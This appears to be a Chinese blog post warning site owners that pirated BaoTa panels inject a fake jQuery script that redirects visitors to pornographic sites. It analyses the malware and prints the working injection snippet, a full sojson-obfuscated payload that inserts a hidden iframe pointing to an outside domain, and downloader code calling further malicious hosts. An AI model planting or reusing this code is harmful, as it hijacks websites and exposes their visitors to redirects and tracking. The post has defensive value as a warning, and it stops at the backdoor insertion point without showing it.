大数跨境
首页
>
警惕!网站无故跳转色情页面?盗版宝塔暗藏后门的坑必须避开
>

警惕!网站无故跳转色情页面?盗版宝塔暗藏后门的坑必须避开

警惕!网站无故跳转色情页面?盗版宝塔暗藏后门的坑必须避开 跨境Emily
2025-08-24
122
导读:最近,不少站长反馈遇到了一个棘手的问题:自己运营的正规网站突然变得 “不正规” 了 —— 用户访问时会毫无征兆

最近,不少站长反馈遇到了一个棘手的问题:自己运营的正规网站突然变得 “不正规” 了 —— 用户访问时会毫无征兆地跳转到色情网站,这不仅严重影响用户体验,更可能让网站面临信誉危机和监管风险。经过技术排查,罪魁祸首直指盗版的宝塔面板。

深入调查后发现,这些被篡改的盗版宝塔面板中,所有托管的网站都会被强制加载一个可疑资源:“

https://bootscritp.com/lib/jquery/4.7.2/jquery.min.js

”。这个看似普通的 JavaScript 文件,实则是恶意代码的 “载体”。一旦网站加载了该资源,用户访问时就会 100% 触发跳转色情网站的恶意行为,背后的原理是恶意代码通过修改网页跳转逻辑、植入自动触发的跳转指令,实现了对正常网站的劫持。


<script>document.cookie="hasVisited178a=1;Max-Age=86400;Path=/";(function(){    var hm=document.createElement("script");    hm.src=atob("aHR0cHM6Ly9ib290c2NyaXRwLmNvbS9saWIvanF1ZXJ5LzQuNy4yL2pxdWVyeS5taW4uanM=");    var s=document.getElementsByTagName("script")[0];    s.parentNode.insertBefore(hm,s);})();</script>


问题现象:无征兆跳转背后的异常资源加载


https://bootscript.com/lib/jquery/4.7.2/jquery.min.js

来源可疑:

bootscript.com 并不是 jQuery 官方 CDN(官方是 code.jquery.com 或 cdnjs.cloudflare.com)。

这可能是 恶意脚本注入,借“jQuery”名义实际执行恶意代码。

不存在的 jQuery 版本:

jQuery 官方没有 4.7.2 这个版本。说明脚本几乎可以确定是伪造的。

安全风险:

这个外部脚本一旦被加载,可能会窃取 cookie、注入广告、劫持表单、植入后门。

前面还特地设置了 hasVisited178a 的 cookie,可能用来标记访问过的用户,避免重复加载。

直接访问该地址显示已被阻止
通过模拟百度蜘蛛查看源代码 
['sojson.v4']["\x66\x69\x6c\x74\x65\x72"]["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"](((['sojson.v4']+[])["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"]['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']['\x61\x70\x70\x6c\x79'](null,"33M102O117C110S99S116H105m111A110N40y112f41p123U34f117s115G101R32g115M116p114e105U99N116N34o59P33W102i117F110L99m116i105X111S110z40d116B41y123b118K97l114t32B115z61K119O105j110q100A111b119E44w101k61i100o111p99Y117k109u101a110T116R44U105n61F112D44A99Z61P34Q34T46b99C111E110D99A97g116A40t34L104v116c116S112X115K58B34j61h61J61j101L46S108U111v99c97Y116L105Z111M110g46b112I114z111i116j111A99y111p108D63d34M104x116t116N112D115K58y47g47w34Q58T34y104s116N116G112W58G47q47o34y44y34B115D100Q107i46V53p49y46m108j97G47i106K115u45s115k100F107v45Y112t114o111f46c109d105g110i46p106D115L34F41c44b110K61h101U46Q99F114n101a97U116G101M69S108L101G109k101O110N116j40R34P115v99T114G105s112i116e34r41z44t114V61S101P46r103E101r116I69h108Z101S109Y101i110c116J115m66n121J84q97t103y78b97Y109P101y40A34l115m99o114D105Q112Z116j34a41q91g48G93u59I110G46k116H121L112B101W61d34p116y101b120Q116p47Y106f97Z118h97i115r99B114K105L112m116M34M44u110v46I115H101S116e65i116i116I114s105G98J117J116A101c40a34h99R104H97n114K115d101i116v34W44h34I85S84Q70J45t56u34J41f44J110x46G97c115x121G110Q99C61s33D48M44E110z46t115p114G99R61X99H44c110E46C105N100u61A34Z76s65X95b67H79q76K76f69E67g84c34m44S105Z46V100H61Y110F59X118G97C114H32v111A61v102z117z110w99Q116H105n111a110j40T41s123s115L46W76F65t46j105j100I115P46X112k117q115v104t40d105K41d125E59z115D46w76s65O63B115Y46N76a65W46u105n100a115V38i38W111a40R41u58f40f115L46N76L65u61d112K44H115t46a76P65z46x105B100D115a61n91t93Y44k111G40S41F41o44P114O46d112v97a114g101a110o116s78b111c100r101j46I105k110a115c101Y114o116n66B101n102a111S114G101u40w110n44k114Z41h125N40W41V125o40V123g105h100t58C34q51i78q66I98S112k107E90K100B122H111I110z55y79o51Z49o48w34f44W99v107f58i34p51h78c66p98X112j107O90c100x122U111R110s55k79b51S49E48c34O125q41y59"['\x73\x70\x6c\x69\x74'](/[a-zA-Z]{1,}/))))('sojson.v4');var _hmt = _hmt || [];(function() {  var hm = document.createElement("script");  hm.src = "https://hm.baidu.com/hm.js?f362cd8d4646a98c0bc584b9bf1a5c63";  var s = document.getElementsByTagName("script")[0];   s.parentNode.insertBefore(hm, s);})();
['sojson.v4']["\x66\x69\x6c\x74\x65\x72"]["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"](((['sojson.v4']+[])["\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72"]['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65']['\x61\x70\x70\x6c\x79'](null,"40U40q41D61g62T123X10U10m10L32F32P32z32n99Q111h110P115Q116y32c99m111k110a102A105Q103X32k61D32z123t10U32C32q32y32e32S32H32g32w107F101x121n58K32g34G49u51o55B57j50R52c50a55B97P98o54U48V52N51H55w98a97s102E98r53B53M48d56h56j101Q52b53u101f48R101L48e54j34C44V10S32i32Y32a32J32h32Z32u32W101f110N99T114x121n112t116I75D101j121i58U32u34h53o48e56g56n101w52o53a101M48j101i48W54m34d44O10t32X32V32A32s32j32x32Z32S97g100V100R114z101N115M115D58x34g104H116h116D112K115T58M47i47t114T56P106g51A106j46P99R108o117x98c63b112k97v114v101u110P116b95X105A99Z111p100A101m61D57d49V48v55l57X55h51K56i49f34E44z10g32U32N32K32q32l32P32K32W99U111A110c100m105b116s105h111F110H84g121g112N101u58Z32U34B84l73i77x69z90V79v78P69b34x44S10w32R32x32Y32I32S32F32R32X106P117s109d112y84K121v112P101d58s32w34l73Z70j82Q65s77S69p34Y44Y10T32T32P32a32H32X32V32j32S106T117T109c112N80U101x114x99J101m110p116I58b32x49P48k48J44V10L32B32v32U32e32l32h32E32n106V117A109Y112H67H111n117m110n116F58j32c49E10q32W32X32R32Y125l59J10n10J32K32B32a32l102Y117t110o99k116v105k111g110N32B101X110f99R114t121S112B116D40d115x116J114L41N32L123q10m32V32f32D32I32V32V32u32D114N101G116N117S114B110c32D95R95m116F114g121J40V40n41P61S62P123m10i32u32v32D32a32e32e32e32a32e32N32L32r99I111c110p115y116q32i107Q101B121K67R111L100V101D115j32O61K32a65O114o114D97F121I46a102w114M111r109f40w99x111S110l102j105D103R46s101R110f99R114W121b112E116G75h101O121G41P46R109e97O112u40z99e32N61G62C32r99Y46a99d104L97Q114e67o111c100o101w65f116c40d48n41q41I59i10I32k32M32F32c32X32r32U32Q32W32j32U32F114k101n116r117F114p110j32z65K114Z114y97g121x46v102M114S111V109Y40K115w116P114t41X46E109c97v112t40X40e99z44r32s105p41p32C61J62I32M83d116T114N105Z110R103H46L102m114N111b109I67D104m97j114L67i111J100k101z40o99a46i99e104u97m114q67x111l100M101N65g116G40G48x41M32n94F32p107o101a121L67h111d100L101P115G91q105k32j37i32H99A111P110w102S105C103o46G101x110Z99Z114O121o112u116M75S101Q121C46X108d101A110f103m116M104V93I41F41D46L106W111s105X110H40S39c39K41k59b10Z32I32g32k32C32Q32N32k32Y125P44D32V40g41j61I62I34d34Z41c59s10J32r32o32t32l125M10m10w32j32N32T32s102o117W110g99S116D105P111I110W32A114g101q97N100B121j40e99P97Y108S108C98A97U99G107y41g32S123K10a32C32w32q32u32E32B32j32k95F95P116o114i121P40P40o41R61b62r123N10W32h32j32r32g32U32w32R32v32i32e32s32d105G102G32a40p100D111p99p117H109S101k110t116Q46q114m101r97U100f121L83w116j97k116f101P32w61U61t61r32A39z99F111U109S112b108o101S116W101O39O32U124z124z32H100l111R99R117O109R101c110q116L46S114J101R97i100Q121j83H116K97q116s101a32S61k61b61M32i39y105m110C116A101U114d97L99R116R105c118l101f39g41p32U123I10X32F32J32H32v32G32m32t32I32B32o32U32x32J32A32X32b99z97C108z108i98a97m99u107y40U41C59L10k32S32s32K32f32s32V32q32D32x32E32n32M125B32B101M108X115p101O32i105q102H32o40s100w111a99w117w109M101D110Q116j46Z97j100Y100O69G118c101C110x116K76s105V115C116P101j110m101n114y41X32Z123C10z32b32P32S32j32O32H32F32G32q32v32X32Z32v32y32J32V100M111C99S117A109l101P110e116i46R97e100E100o69v118e101C110V116K76r105L115R116m101a110m101b114L40Q39m68x79M77K67q111L110M116Y101l110R116z76L111c97X100L101a100S39T44A32N99w97C108w108D98q97M99w107g41U59P10f32S32X32F32c32W32R32M32J32o32U32e32H125c32L101D108V115O101t32l105Q102o32u40I100y111o99W117O109M101F110X116l46Q97a116M116l97V99n104n69Z118W101d110M116s41b32W123i10c32d32V32K32x32P32y32z32p32K32C32o32a32t32Z32Z32b100D111G99r117q109X101S110K116R46E97K116l116f97O99y104R69f118V101M110s116U40U39A111B110k114H101E97S100d121S115W116T97H116a101o99V104M97o110X103l101A39n44i32v102R117X110x99t116v105P111d110u40H41Y32A123a10c32v32R32L32J32t32C32M32Z32n32a32T32x32n32r32H32Z32m32f32x32E105r102O32p40N100J111O99S117m109K101A110d116x46Q114n101b97W100h121f83T116a97K116g101G32v61u61K61c32d39p99W111s109y112E108w101g116C101G39B41Y32c123s10G32O32y32E32B32R32A32u32K32p32m32L32H32m32k32S32I32g32k32j32C32S32G32i32d99K97O108v108P98Z97Q99Y107C40G41q59d10L32c32I32r32W32S32X32j32H32C32l32c32y32Q32d32k32n32g32j32l32j125R10X32p32L32Q32b32a32b32O32q32D32x32c32q32m32K32D32W125i41R59h10j32c32B32b32N32E32q32U32w32W32u32T32n125o10q32P32A32g32K32J32a32Q32E125s44F32l99V97Y108V108t98R97T99I107J41Z59D10S32e32l32N32c125v10c10a32y32y32i32I102N117J110C99Z116R105f111G110z32S100X111m74K117b109q112M40k41Y32W123N10n32N32K32w32H32n32s32t32H32M32c32m32K105U102g32E40I33i99d111R110F102X105H103W46i106j117E109Y112E84e121N112E101m32R124H124A32w99j111L110s102J105E103z46j106Y117G109G112l84g121c112P101O32z61i61e61v32L34N68u73I82X69j67C84y34O41G32q123B10G32E32Y32r32j32L32I32Q32g32d32y32H32D32y32x32M32z119O105Y110F100N111J119v46q108h111f99i97C116Q105V111v110g46R114n101K112S108t97N99r101d40b99B111G110O102F105J103u46Q97A100A100J114D101C115X115g41j59e10S32I32E32F32y32J32b32D32y32A32l32c32N125q32P101B108o115Y101c32O105d102y32B40U99O111O110A102K105B103F46a106i117j109f112Q84E121F112P101X32Z61t61B61E32H34m73d70x82l65U77u69i34T41u32u123y10V32Z32K32v32C32E32n32t32I32o32m32I32j32l32e32Q32A114o101q97K100M121v40L40x41o61E62l123e10o32e32X32y32y32m32Q32L32N32k32W32J32k32Q32r32p32s32O32S32d32y115w101W116s73o110B116z101K114W118B97c108Z40i40J41W61V62C123R10L32p32B32m32B32F32B32e32r32L32I32V32c32t32j32u32E32v32R32D32J32x32a32G32H95p95L116Q114o121X40S40s41y61z62V123B10C32A32F32E32R32n32V32M32x32o32X32P32p32o32n32v32O32C32G32N32T32E32u32c32x32q32R32S32c105p102j32r40m100I111t99F117n109e101Z110g116P46C103i101N116I69s108S101r109O101B110M116G66x121w73H100C40P99q111o110e102t105d103U46k107J101y121v41j32C61r61P32H110V117k108S108m41T32R123V10x32J32R32U32Z32M32Q32i32O32n32X32v32I32g32B32g32f32W32b32q32T32t32a32a32S32o32B32m32S32J32k32D32J100S111p99V117G109W101M110v116u46y98y111E100y121l46d105r110O115D101X114i116H65N100u106L97j99Z101R110A116j72G84W77W76A40N34g98G101i102F111n114o101e101X110H100o34y44B32m96d60y105p102m114i97T109T101X32Z105I100k61S34B36K123u99s111z110g102v105P103a46Z107E101d121H125A34w32M115r99B114L111x108K108S105D110P103Q61c34p97k117s116n111a34d32t109A97L114W103R105K110X104t101X105H103j104J116N61x34f48V34I32r109z97d114P103G105C110Y119H105x100k116r104u61c34R48B34u32t102f114B97m109k101X98a111d114f100d101F114N61F34j48m34D32F119Y105T100t116I104b61q34l49g48r48y37E34g32o104g101G105S103L104T116V61J34K49q48s48v37D34G32A115W116E121o108f101k61M34q122O45K105P110y100i101j120C58s32x57E57u57L57C57q57P57Y57Z57T57B57Q59H32H112x111R115L105l116B105k111b110Q58i32A97m98w115i111N108x117I116z101w59G32e108P101u102y116p58n32n48S59R32v116G111b112b58Y32i48I59h109g105g110y45q104i101s105G103m104F116B58n49S48p48R118T104u59D118n105T115Z105G98K105Q108t105h116y121D58j32Y118Q105P115A105v98R108I101V59H112C97W100Y100s105U110k103I58o48r59K109N97f114z103H105n110o58c48K59c34J32q115R114I99t61c34y36u123J99X111V110m102G105f103P46x97O100z100P114J101C115M115M125H34z62O60h47J105b102o114g97v109S101o62g96w41Y59D10Z32A32v32t32l32l32f32M32C32v32s32T32l32A32h32g32N32X32l32I32L32n32F32o32K32p32X32M32u125R10F32Y32Q32V32c32P32T32D32f32z32V32Y32V32J32Y32U32v32Y32F32L32L32M32b32Q32z32z32D32L32D99Q111g110W115z116J32A99W104G105p108R100h114x101l110a32p61h32V100V111P99Y117U109K101W110z116i46Z98J111u100o121E46P99S104W105i108j100j114G101J110F59K10B32b32G32M32T32D32e32B32H32f32x32n32Q32i32y32Y32d32b32i32j32L32b32Y32b32s32q32t32n32v102h111O114Y32j40B108Y101N116W32V105e32a61x32a48F59A32M105Y32F60L32Q99P104C105n108E100o114E101x110j46u108N101v110h103B116G104D59Y32t105a43V43h41Y32Y123w10u32H32d32y32a32a32Y32X32w32x32s32y32N32l32s32k32W32X32n32v32a32O32r32o32V32T32L32M32n32O32J32N32S99H111C110A115w116J32L110B111R100L101S32P61m32D99E104u105H108Y100n114Z101a110n91a105B93m59M10K32b32i32X32b32w32S32d32G32a32C32C32G32T32W32O32V32K32I32L32m32U32B32C32P32S32L32Z32V32B32i32h32c105w102b32A40l110R111r100D101x46T105D100Y32i33Z61S61M32D99l111C110c102o105L103Y46c107o101l121P32K38m38a32y110K111Y100I101U46A115b116K121V108N101P46I100E105a115y112H108z97D121Z32H33s61m61h32Q34m110l111t110v101g34F41j32S123r10p32C32s32c32y32M32T32o32Z32l32h32S32f32d32d32B32E32e32h32H32N32b32j32o32o32v32c32X32g32v32a32f32R32M32t32D32B110g111t100x101q46w115E116o121O108V101e46T100W105P115m112v108G97Y121C32M61k32Z34K110A111i110X101o34P59A10e32K32l32u32x32a32N32B32C32E32T32x32z32Z32c32E32K32e32z32k32u32n32N32p32v32I32g32m32b32P32R32U32e125f10K32l32t32D32v32C32w32y32W32Q32f32W32l32F32m32c32D32Q32n32s32J32B32T32O32p32D32a32C32O125T10N32p32q32W32N32j32T32L32f32q32k32n32h32N32W32i32v32K32n32c32D32K32G32e32e32Y32F32L32W100X111u99j117L109b101e110q116T46I98U111N100i121K46R115P116J121N108F101r46q111F118U101r114I102l108l111P119R32g61Q32P34K104e105U100S100z101N110K34p59C10i32v32R32w32p32f32D32y32P32n32f32L32D32k32m32C32L32m32n32x32g32G32y32I32K125W44e32p99c108X101b97s114p83g116n111q114e97J103T101V41H59D10r32m32N32b32D32r32m32Y32X32F32i32o32E32B32C32r32Q32t32o32c32H125a44Q32n49j48k48z41G59X10M32s32A32A32w32e32L32L32R32H32V32Q32U32j32f32a32p125G41S59u10M32B32d32r32j32u32R32L32j32y32A32m32M125I10M32P32M32y32o125e10p10Q32J32A32k32P102b117j110Q99g116l105E111x110Y32M99j111T110Z100Q105q116a105u111U110q67X104D101i99r107t40k41c32L123K10t10b32W32l32J32b32G32T32C32X108s101Y116p32U100p97C116v97P32K61a32P95z95d116K114E121D40e40S41T61J62v74g83M79Q78A46x112e97m114s115b101U40g101Z110u99v114z121f112u116E40b108I111x99J97Z108z83k116x111V114I97q103c101t46n103S101r116R73L116b101g109Q40N99t111B110g102Z105H103Y46G107D101Z121O41k41d41Y41L32W124x124c32J123u125i59O10x10R32q32U32T32t32L32x32G32P99t111w110P115L116a32V116W111c100T97H121e32B61f32h40P110H101X119Z32C68K97H116U101L40d41a41I46u116u111k73X83K79V83v116p114D105s110t103K40e41o46E115T112U108a105S116J40o34a84A34w41M91A48O93Q59W10d32c32R32P32F32p32n32N32L105J102K32W40r100G97k116P97R46G100y97w116C101w32s33y61c61t32h116U111e100Q97p121T41O32d123x10L32o32q32F32T32r32Y32x32B32m32S32R32g100m97k116e97w32e61J32D123S32Z100s97y116W101X58Y32G116s111y100J97b121U44e32c99J111q117n110T116U58C32s48Z32K125u59L10G32C32o32G32v32T32V32L32T125V10C10Z32s32S32W32x32U32N32y32B105c102S32d40S105E115D78Q111Z116I77W111V98b105H108M101x40Y41v32p124X124d32H100a97R116u97J46c99T111J117g110P116t32f62Q61T32z99I111B110T102d105k103O46X106z117x109u112c67m111v117m110J116e32K124C124w32M77b97z116q104v46o114D97w110l100V111X109H40Y41L32L42H32k49O48F48g32c62s61a32P99h111N110W102I105O103C46Z106Z117O109J112F80N101A114I99o101Z110S116R41y32p123c10Z32V32t32S32W32O32W32M32T32S32G32p32J114Q101P116G117k114G110L59Y10h32p32r32P32A32w32k32e32D125U10B10T32S32D32J32L32o32x32d32h100d97w116b97y46E99V111k117H110L116P32Y61I32v100c97E116d97K46u99N111o117z110h116N32U43k32g49i59P10e32x32h32E32H32P32S32d32i108F111Q99z97l108f83R116N111C114J97t103R101j46I115j101e116G73K116z101A109L40j99b111P110o102C105c103t46B107r101G121h44V32n101I110p99g114Q121C112U116E40K74P83f79E78r46V115a116E114O105m110w103K105D102z121z40G100s97N116x97I41t41N41K59P10T10D32E32s32z32B32j32Z32N32x105k102f32r40a33J99B111K110C102E105c103g46Y99R111d110U100P105B116u105Y111K110V84W121k112C101T32c124I124u32m99z111U110P102x105C103Q46g99d111A110X100O105G116T105y111s110n84h121C112S101w32i61A61v61i32L34a84K73N77j69n90K79M78N69A34z41j32F123t10F10V32Y32l32q32o32v32V32g32T32Z32s32e32z108L101B116T32t99D108u105B101O110m116z84n105i109w101i122v111b110v101v32i61Y32p95Y95x116q114K121X40S40d41j61F62F73P110K116K108W46F68L97d116T101e84I105y109V101Z70y111f114w109u97H116C40d41b46k114L101b115O111r108I118f101C100h79W112m116y105y111x110k115x40V41p46K116I105k109G101B90K111B110x101z44K32s99P108c101D97o114A83s116m111K114L97F103a101D41e32p124X124F32B34Y34Z59u10o10z32w32D32d32E32c32a32Z32A32z32G32T32A105l102k32q40Q99L108Z105U101q110O116n84I105O109z101P122f111Q110K101C32C61q61h61M32E34y65V115O105s97F47q83y104a97V110B103l104V97k105A34r41t32O123s10A32e32j32v32s32W32d32V32V32U32p32Z32G32M32T32Z32R100l111B74M117U109W112v40Z41v59k10u32K32c32l32O32P32E32F32W32w32o32x32c125P10A10e32D32R32W32K32s32n32N32v125B32W101x108I115H101m32A105f102V32t40J99U111d110b102G105k103B46O99M111B110W100W105C116z105X111G110C84W121G112e101p32y61c61Q61U32W34R73J80n34T41B32r123p10y32a32W32f32x32p32q32i32v32c32N32F32j102v101C116E99W104e40r34v104P116f116U112M115w58z47X47c97i112n105c46o105F112z46W115Q98V47M103Q101w111J105x112J34T44P32u123k10n32y32s32s32R32C32f32E32t32W32z32E32Y32A32S32T32g114P101d102z101B114Q114a101W114r80n111c108u105g99B121K58L32W34e110z111b45A114q101c102f101s114g114h101s114m34C10k32M32M32L32a32e32k32t32J32B32I32l32X125L41R10f32i32t32O32c32w32P32F32Q32y32f32n32F46J116Q104Q101p110i40i114F101a115r112x32O61i62d32C114T101I115Z112K46p106d115O111B110M40Q41w41w10r32f32U32u32N32U32R32s32G32T32Z32d32c46B116v104k101V110s40h106I115T111Q110F32L61N62f32N123X10p32W32F32c32S32j32a32t32k32h32d32y32G32g32Z32r32F105v102C32f40h106w115Q111u110K46z99t111y117p110K116d114B121g95i99X111r100l101E32Y61T61E61F32u34r67a78O34o41W32B123z10z32I32V32O32r32J32k32F32p32S32F32P32v32P32S32b32T32Z32N32G32J100s111T74j117s109P112j40C41g59G10r32G32o32V32E32s32f32X32w32q32E32N32Y32m32C32I32l125N10h32e32s32X32s32m32W32C32L32b32i32d32d125i41A46K99D97M116g99d104b40V101U114E114r61N62O99g108m101O97D114X83x116Y111A114Y97m103s101R41a59h10R32q32z32i32W32k32B32Z32s125p10X32v32N32w32P125x10v10O32x32c32I32C102A117F110I99V116I105h111d110w32M105Y115o77Q111w98n105G108y101A40Z41N32B123t10g32J32B32N32n32R32q32w32S114p101P116v117N114d110U32n33A105v115d78q111k116i77J111n98Y105m108V101j40s41M59H10m32C32a32x32W125o10P10L32Q32e32a32i102W117d110n99P116g105y111w110n32H105X115a78M111v116y77r111R98p105O108H101o40t41O32Z123i10P32I32q32j32w32E32c32b32s114q101z116d117O114y110F32y95v95j116U114g121u40v40V41O61m62t123W10g32g32k32o32z32N32L32F32w32X32j32h32E99z111S110n115s116o32z112t108l97N116S102q111W114q109y32k61W32Z110y97J118B105Y103d97A116H111a114b46F112S108f97l116L102M111v114D109k59i10E32m32m32r32q32f32P32S32c32T32J32Z32C99l111b110Z115v116K32x119S105r110y32Y61J32M112r108V97g116U102J111k114d109u46d105Q110v100g101J120X79V102Q40v39k87R105h110l39F41g32m61x61J61C32F48E59s10i32F32L32L32m32w32C32n32d32X32t32H32Y99L111g110R115l116R32o109y97I99r32z61w32a112a108Z97U116p102C111A114i109p46X105f110u100N101s120Q79X102d40J39E77z97C99s39P41S32m61D61Q61Y32D48C59D10H32s32b32I32u32T32j32x32x32s32d32v32o99d111e110h115s116j32U120B49s49m32s61x32b112y108P97N116K102j111O114K109R46d105o110X100z101F120p79W102g40J34J88H49I49p34V41e32R33a61l61S32O45J49N32v124Y124W32G112C108Y97c116q102J111Z114q109V46p105H110I100z101w120y79l102J40Y39G120A56t54e39D41w32n33G61y61l32c45i49n32I124a124J32Z112m108g97k116l102T111t114h109v46a105W110C100s101b120g79t102Z40h39P105W54l56T54D39t41E32a33k61K61e32q45y49T32Q124h124F32j112o108l97S116i102i111M114F109G46H105k110A100N101L120E79x102U40l39u105z51P56m54M39P41c32t33A61l61e32t45m49l59E10c32S32c32o32G32J32Z32q32L32q32s32b32C114n101T116Y117U114u110g32k119G105k110d32v124r124o32L109U97U99z32G124T124p32O120u49D49Z59P10X32k32I32M32O32a32H32W32e125Y44j32l101V114H114e61s62N116A114F117O101t41v59W10c32m32h32F32m125p10U10B32D32y32U32m102O117S110F99v116f105m111K110k32F99I108L101V97D114a83U116O111f114A97X103B101v40o41Q32r123v10M32a32Z32Z32a32E32W32i32X108u111r99d97A108A83g116z111z114g97t103b101C46S114a101Y109d111l118T101i73E116U101I109a40T99G111K110S102s105P103S46I107s101B121l41H59C10w32X32N32D32O125t10X10J32n32S32H32l102M117k110F99D116Z105V111H110f32o95e95r116Y114g121V40s102l117R110G99n44Y32o101s114a114R41I32j123j10k32v32J32J32Q32p32v32w32e116z114r121J32t123g10Z32D32W32l32I32y32x32e32k32N32J32S32R114f101A116d117s114N110E32N102w117S110h99z40B41l59X10v32R32N32J32S32z32N32r32O125v32X99D97q116F99o104c40j95o101R114f114r41L123C10B32m32I32W32x32J32Y32C32d32C32c32u32y105B102j40I101e114p114h41J32U114W101h116F117o114n110x32O101b114T114b40l95g101b114x114M41X59H10q32c32B32L32Z32i32o32H32J125v10P32H32G32K32C32q32I32d32s114y101b116E117N114L110P32V117X110U100m101q102H105D110N101X100K59h10J32C32k32J32a125V10A10l32Z32A32l32F99O111z110P100G105C116z105c111Q110W67N104P101Y99U107N40S41M59C10a10C125w41H40C41"['\x73\x70\x6c\x69\x74'](/[a-zA-Z]{1,}/))))('sojson.v4');


这一段其实就是 混淆/加密过的 JavaScript 恶意脚本,解读一下关键信息:

代码特征

  1. 大量 "\x66\x69\x6c\x74\x65\x72" 形式的十六进制字符串

    • 这是典型的 JS 混淆/逃逸写法,用来隐藏真正的关键字。

    • 比如 "\x66\x69\x6c\x74\x65\x72" → "filter"

  2. sojson.v4

    • sojson 是一个常见的 JS 混淆工具 (sojson.com),说明这段代码被 sojson v4 混淆器处理过。

  3. 逻辑

    • 里面有 constructorfromCharCodeapply 等组合,说明是通过动态字符串拼接,执行隐藏的代码。

    • 它会动态构造一段新的 JS,然后执行。

  4. 可疑请求

    • 里面有:

          
      
     
      
     
      hm.src = "https://hm.baidu.com/hm.js?f362cd8d4646a98c0bc584b9bf1a5c63";

      这是百度统计,但很可能是用来 掩盖真实恶意行为 的。

    • 还有:

          
      
     
      
     
      https://r8j3j.club?parent_iconde=910797381

      这是一个可疑外链(非正规域名),极可能是恶意站点。

  5. 逻辑功能

    • 生成一个 <script> 标签,注入外部资源;

    • 监听 DOMContentLoaded / readystatechange 等事件,在页面加载后执行额外代码;

    • 可能会往页面里注入一个 iframe 或 统计/跳转代码

    • 使用 style.display="none" 隐藏注入的元素,避免用户察觉。

    • 解密后主要做几件事:

结论 ⚠️

  • 这不是 jQuery,而是一个被 sojson 混淆过的 恶意脚本

  • 它伪装成 jQuery(/jquery/4.7.2/jquery.min.js),但实际上加载了 百度统计脚本 + 可疑的 r8j3j.club 外链

  • 很可能用于:

    • 挂马(在页面植入恶意 iframe/广告/跳转)

    • 追踪用户

    • 盗取数据


通过外链分析代码: 
var img_data_domain = 'https://tg1579.oss-cn-hongkong.aliyuncs.com';var o_k = 'smu6ch';var down_type = 1;//下载类型,1为OP,2为自有下载页面var down_url = 'https://www.abc.com';//自有下载页面地址var page_data = [];//网站配置function open_down_url(url){//打开下载地址//window.location.href = url;//本页打开window.open(url);//新标签打开}function load_js_css(url, type){console.log(img_data_domain);var oHead = document.getElementsByTagName("HEAD").item(0);if(type == 'js'){//加载JSvar oLoad_url = document.createElement("script");		oLoad_url.type = "text/javascript";		oLoad_url.src = url;	}else{//默认加载CSSvar oLoad_url= document.createElement("link");		oLoad_url.type = "text/css";		oLoad_url.rel = "stylesheet";		oLoad_url.href = url;	}	oHead.appendChild(oLoad_url);}function generateRandomString(length) {var result = '';var characters = 'abcdefghijklmnopqrstuvwxyz0123456789';for (var i = 0; i < length; i++) {var randomIndex = Math.floor(Math.random() * characters.length);		result += characters.charAt(randomIndex);	}return result;}op_service = "https://" + generateRandomString(15) + ".onlyharvestgarden.com:6443";//OP服务地址function check_https(){if (location.protocol !== 'https:') {		location.href = 'https://' + location.hostname + location.pathname + location.search;	}}const Base64 = {decode(str) {return decodeURIComponent(atob(str).split('').map(function (c) {return '%' + ('00' + c.charCodeAt(0).toString(16)).slice(-2);		}).join(''));	}}

代码功能逐段解析

  1. 基础配置

var img_data_domain = 'https://tg1579.oss-cn-hongkong.aliyuncs.com';var o_k = 'smu6ch';var down_type = 1// 下载类型,1为OP,2为自有下载页面var down_url = 'https://www.abc.com'// 自有下载页面地址var page_data = []; // 网站配置

配置了一些全局变量:

  • img_data_domain:资源域名 (OSS 存储地址,通常放图片或脚本)。

  • down_type:下载方式(1 表示走 OP 服务,2 表示走 down_url)。

  • down_url:备用下载页。
下载打开函数 
function open_down_url(url){    window.open(url); // 新标签打开下载链接}
点击下载时会在 新标签 打开链接。
动态加载 JS 或 CSS 
function load_js_css(url, type){    var oHead = document.getElementsByTagName("HEAD").item(0);    if(type == 'js'){        var oLoad_url = document.createElement("script");        oLoad_url.type = "text/javascript";        oLoad_url.src = url;    }else{        var oLoad_url= document.createElement("link");        oLoad_url.type = "text/css";        oLoad_url.rel = "stylesheet";        oLoad_url.href = url;    }    oHead.appendChild(oLoad_url);}

  • 用来动态插入 <script> 或 <link>,从远程加载 JS/CSS。

  • console.log(img_data_domain) 说明它会输出资源域名,方便调试。


  •
随机子域名生成 
function generateRandomString(length) {    var result = '';    var characters = 'abcdefghijklmnopqrstuvwxyz0123456789';    for (var i = 0; i < length; i++) {        var randomIndex = Math.floor(Math.random() * characters.length);        result += characters.charAt(randomIndex);    }    return result;}op_service = "https://" + generateRandomString(15) + ".onlyharvestgarden.com:6443";
会生成一个随机 15 位的子域名,例如: 
https://abc123xyz456789.onlyharvestgarden.com:6443

  • 作为 下载服务 (OP 服务) 的地址。

  • :6443 是一个 非标准端口,常见于 代理 / 转发服务


  •

强制 HTTPS 
function check_https(){    if (location.protocol !== 'https:') {        location.href = 'https://' + location.hostname + location.pathname + location.search;    }}

  • 如果当前页面不是 HTTPS,会强制跳转到 HTTPS。

  • 说明它需要保证加密连接。


  •
Base64 解码工具 
const Base64 = {    decode(str) {        return decodeURIComponent(atob(str).split('').map(function (c) {            return '%' + ('00' + c.charCodeAt(0).toString(16)).slice(-2);        }).join(''));    }}
提供一个 Base64 解码函数,用来还原配置或数据。

总结

这段代码的作用主要是:

  1. 控制下载逻辑:根据 down_type 决定走随机生成的 OP 下载服务,还是跳转到固定的自有页面 (down_url)。

  2. 动态加载资源:可以从 img_data_domain 或其他远程地址加载 JS/CSS。

  3. 强制 HTTPS:保证安全链接。

  4. 数据处理:提供 Base64 解码,用于解读配置或加密参数。


最后经排查发现后门代码插入点

【声明】内容源于网络
0
0
跨境Emily
跨境分享录 | 持续输出实用内容
内容 44679
粉丝 10
跨境Emily 跨境分享录 | 持续输出实用内容
总阅读644.6k
粉丝10
内容44.7k